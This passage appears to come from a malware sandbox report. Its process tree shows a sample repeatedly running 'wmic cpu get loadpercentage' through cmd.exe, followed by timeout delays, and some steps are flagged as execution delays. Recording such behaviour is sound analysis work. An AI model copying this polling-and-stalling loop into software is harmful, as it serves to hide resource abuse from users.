C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1900
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:888
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3744
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1480
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2780
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1492
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3748
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4196
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4564
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3644
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:948
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2836
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2636
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2844
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:72
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1152
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1440
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2256
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3064
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2828
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1520
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1216
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2336
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3772
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1428
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2036
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4660
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3860
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2120
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1032
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2892
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3848
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:704
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1576
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4164
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2272
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3300
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3516
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3496
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3656
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3208
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4024
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:988
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4340
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2144
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2776
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1644
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3228
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4864
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4456
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4748
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4948
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2556
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:508
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3312
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:592
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3492
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2604
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3096
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3288
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4192
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:780
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2716
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2288
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4180
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5000
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3436
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:416
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2244
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3756
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2128
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2252
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:888
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2340
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:496
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4376
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4636
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:700
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:236
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1772
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2108
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3596
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1044
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:752
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1612
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:452
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4796
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3120
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1372
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4708
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2372
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2820
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1608
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4256
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4852
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3984
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4988
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3468
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4572
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3848
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1196
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4828
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3460
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3724
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3356
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:768
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4160
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2132
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3580
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1164
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:396
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3672
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2268
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3208
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5004
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1660
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4032
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3688
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1564
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3296
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3248
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3192
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1288
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3376
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4820
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2932
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5020
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4856
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2260
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:576
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2188
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1484
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2640
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2368
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3204
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5000
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4900
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1972
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1092
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1448
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2444
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:888
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:496
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1580
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4636
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3392
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:240
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2804
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2844
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1180
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2124
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4028
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3064
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3012
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3684
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1348
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2848
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2336
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2464
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1428
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3488
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3652
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2084
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1528
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5044
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3768
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2448
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2524
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3988
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3848
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:720
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4716
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3008
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4056
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4164
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1076
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3568
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:952
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2132
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3300
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3516
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1896
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:584
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2264
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2740
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4340
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1156
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4552
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4332
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2660
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4508
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3844
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2800
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2236
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3292
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4560
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1352
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3312
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4856
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2020
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2260
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4968
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1484
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2420
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2884
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3204
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1364
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2244
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1412
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1560
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2780
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1976
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2996
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:496
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2812
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:580
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2324
